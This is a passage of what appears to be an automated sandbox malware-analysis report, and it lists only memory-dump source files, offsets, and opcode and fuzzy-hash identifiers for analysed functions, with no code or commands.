                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                          • Instruction ID: 68f3a85eb93246a44ab6d7eb75a23d55b58561eebb48e22ece70158358ea0c19
                          • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                          • Instruction Fuzzy Hash: CC027974E006588FCF26CFA8C4906EDBBF6FF89310F548159E8896B355D734AA91CB50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                          • Instruction ID: 128d215a0a37b4351e4f0563ffd83e3ad31ef5456278b2e62bec347eace3e19d
                          • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                          • Instruction Fuzzy Hash: 9C020075E006198FCF25CF98C4809ADB7B6FF88350F65816DE80AAB351D731AA91CF94
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                          • Instruction ID: bbda26e14a018d36bdd975621340a721657ccd440c02d6a24b367b3f0739bc86
                          • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                          • Instruction Fuzzy Hash: 21C17B76E29B824BD713873DD802265F395AFF7294F15D72EFCE472982FB2096818244
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                          • Instruction ID: 2a80da5e2be8b7498ae1d93e971acc157cbaca9d0d40c3aa210c5fdefafba94e
                          • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                          • Instruction Fuzzy Hash: 03D13770600B40CFE765DF29C494BA7B7E0BB4A300F54896ED89B8BB92DB35E845CB51
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                          • Instruction ID: c412a68e6edd65e7f9ed127bfcb30174a18830014d6fecd38906b901b8e21602
                          • Opcode Fuzzy Hash: 6d6835ef883b13d007bd8ff82b789808819c9fcac3ce35a3119cc9747a60bc0b
                          • Instruction Fuzzy Hash: 64D13BB050D3818FD3158F15C0A472BBFE0AF95708F18C99EE4D90B392D7BA8948DB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                          • Instruction ID: b67111edd1992e2adda69fc09a9f9217b063cb7299bf5e163ac437e45ccd550a
                          • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                          • Instruction Fuzzy Hash: CEB18E72A083515BD308CF25C89136BF7E2EFC8310F1AC93EE89997291DB74D9459A82
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                          • Instruction ID: 729cf9cab662162a5fccfaf7d3d12e57bbe3d27618c896e42a6fa0b4d5a60cd7
                          • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                          • Instruction Fuzzy Hash: 2BB19372A083115BD318CF25C89179BF7E2EFC8310F1AC93EF89997291D778D9459A82
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                          • Instruction ID: f0c6a13b9b5789bfa04aed31515b17dfa819ce7da3d186ed9aa042d73cbb8296
                          • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                          • Instruction Fuzzy Hash: 28B12875A097118FD706EE3DC48121AF7E1AFE7280F51C72EE895B7662EB31E8858740
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                          • Instruction ID: 2d0fe485fcfa2d2ed37a276b3aef69927a943b08cf33cfeb444ca56998767031
                          • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                          • Instruction Fuzzy Hash: 8491C271B00215ABDF54CEA8DC81BBAB3E0AF55300F194568ED18AB386D372DD45E7A2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                          • Instruction ID: 0a9345f68abcb9ca1f0634053f1b194f46cf95e1fa5637dc22b62a899a5b00df
                          • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                          • Instruction Fuzzy Hash: F6B14B316106099FDB55CF6CC48AB657BE0FF46364F29865CE899CF2A2C735D982CB40
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                          • Instruction ID: 0a4e27b2faa6ab2905058e4f492f0502fe05c92c2ad3f2e2cad06cc4fd7afae8
                          • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                          • Instruction Fuzzy Hash: 96C15A75A0471A8FC711DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                          • Instruction ID: 299bd74ecc14adda04d354d3de14e7bffa1568abc8add43dcca27177bb46c708
                          • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                          • Instruction Fuzzy Hash: 06913831928791AAEB169B38CC417AAB794FFE7350F14C31BF9C872492FB7185818345
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                          • Instruction ID: b7553f9dfe27c6bb0511da58b84e1c5abc8a818193c49f1568e7cffadd782c39
                          • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                          • Instruction Fuzzy Hash: 3DA12CB2A50A19CBEB59CF55CCC1A9EBBF1FB58314F14C62AD41AE72A0D334A944CF50
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
